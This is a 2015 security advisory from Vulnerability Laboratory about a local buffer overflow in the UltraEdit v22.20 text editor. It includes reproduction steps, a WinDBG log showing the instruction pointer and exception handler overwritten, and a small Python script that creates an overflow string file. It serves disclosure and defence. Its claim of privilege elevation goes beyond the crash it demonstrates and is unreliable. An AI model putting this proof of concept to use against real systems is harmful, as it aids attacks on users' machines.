Document Title: =============== UltraEdit v22.20 - Buffer Overflow Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1601 Release Date: ============= 2015-09-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1601 Common Vulnerability Scoring System: ==================================== 6.3 Product & Service Introduction: =============================== UltraEdit by IDM is the ideal text, HTML and hex editor, and an advanced PHP, Perl, Java and JavaScript editor for programmers. UltraEdit is also an XML editor including a tree-style XML parser. An industry award winner, UltraEdit supports disk-based 64-bit file handling (standard) on both 32- and 64-bit Windows platforms. IDM has been publishing software since 1994 and is a highly stable, debt-free company and trusted CISP compliant merchant. IDM products have won coveted industry awards to include PC Magazines Annual Editors Choice Award and the Shareware Industry Application of the Year Award, as well as the Shareware Industry People`s Choice Award. Our software is highly recognized for its programming excellence and is featured internationally in numerous magazines. Our UltraEdit text editor product is recognized around the world as one of the best products of its class. IDM is recognized as a certified Microsoft partner. IDM products have nearly two million registered users in most countries, and are localized in eight different languages and are recognized around the world. Numerous Federal, State, and Local governments/agencies, Fortune 100/500/1000 companies, and hundreds of thousands of private users use IDM products worldwide. (Copy of the Homepage: http://www.ultraedit.com/downloads/ultraedit_download.html ) Abstract Advisory Information: ============================== An indepdent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official UltraEdit v22.20 software client. Vulnerability Disclosure Timeline: ================================== 2015-09-15: Researcher Notification & Coordination (ZwX) 2015-09-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A classic local unicode buffer overflow vulnerability has been discovered in the official UltraEdit v22.20 software client. The vulnerability allows local attackers to gain higher system or access privileges by exploitation of a classic unicode buffer overflow vulnerability. The vulnerability is located in the Menu -> project -> Options index files module. Local attackers with low- privilege system user accounr or restricted system privileges are able to compromise the local system by exploitation of a classic unicode buffer overflow vulnerability. The local attacker copies a specific byte size string to the options index files input to overflow the process and overwrite the registers like exc or eip. Thus allows the local attacker to takeover the system process of the software client to compromise the local system/server. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Vulnerable Module(s): [+] Menu > Project > Options > Index Files (Input) Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software and start the client 2. Copy the AAAA...string from bof.txt to clipboard 3. Run UltraEdit.exe 4. Go Menu -> project -> Options index files 5. Paste it the input AAAA....string and click Browse 6. Software will stable crash or shut down 7. Successful reproduce of the local buffer overflow vulnerability! --- Debug Log (WinDBG) --- eax=00000000 ebx=00000000 ecx=00410041 edx=77a372cd esi=00000000 edi=00000000 eip=00410041 esp=0024e284 ebp=0024e2a4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 uedit32+0x10041: 00410041 0200 add al,byte ptr [eax] ds:0023:00000000=?? 0:000> !exchain 0024e298: ntdll!RtlRaiseStatus+c8 (77a372cd) 0024ecf4: uedit32+10041 (00410041) Invalid exception stack at 00410041 0:000> d 0024ecf4 0024ecf4 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed04 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed14 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed24 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed34 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed44 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed54 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. 0024ed64 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. PoC: Exploit Client v20.0.0 buffer = "A"*10000 file = open("bof.txt","w") file.write(buffer) file.close() print "File Created" print " Contact msk4@live.fr" Solution - Fix & Patch: ======================= Restrict the Option > Index File input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field. Security Risk: ============== The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3. (CVSS 6.3) Credits & Authors: ================== ZwX Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt # Iranian Exploit DataBase = http://IeDb.Ir [2015-10-11]